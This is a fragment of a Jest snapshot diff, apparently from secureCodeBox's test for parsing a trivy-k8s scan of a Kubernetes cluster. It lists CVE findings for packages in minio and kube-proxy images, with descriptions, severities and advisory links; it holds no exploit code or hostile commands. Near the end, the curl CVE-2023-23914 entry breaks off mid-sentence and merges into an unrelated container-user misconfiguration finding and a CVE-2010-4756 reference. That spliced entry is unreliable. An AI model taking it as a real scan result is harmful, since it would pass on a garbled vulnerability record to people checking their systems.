"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4269-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, ], "severity": "LOW", @@ -113314,135 +112831,173 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3715", - "installedVersion": "5.1-2+deb11u1", - "packageName": "bash", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0340", - "https://access.redhat.com/security/cve/CVE-2022-3715", - "https://bugzilla.redhat.com/2126720", - "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", - "https://errata.almalinux.org/9/ALSA-2023-0340.html", - "https://errata.rockylinux.org/RLSA-2023:0340", - "https://linux.oracle.com/cve/CVE-2022-3715.html", - "https://linux.oracle.com/errata/ELSA-2023-0340.html", - "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", - "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "a heap-buffer-overflow in valid_parameter_transform", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3715", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0340", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3715", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2126720", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0340.html", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0340", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3715.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0340.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + }, + { + "type": "URL", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -113450,67 +113005,85 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -113518,1976 +113091,2141 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", ], }, "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", + "name": "iptables: buffer overflow in iptables-restore", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "POST following PUT confusion", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://issues.rpath.com/browse/RPL-1825", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-7169", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-7169", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "https://github.com/shadow-maint/shadow/pull/97", + "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "https://security.gentoo.org/glsa/201805-09", + "https://ubuntu.com/security/notices/USN-5254-1", + "https://www.cve.org/CVERecord?id=CVE-2018-7169", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2018-7169", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://access.redhat.com/security/cve/CVE-2018-7169", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://github.com/shadow-maint/shadow/pull/97", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://security.gentoo.org/glsa/201805-09", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5254-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": 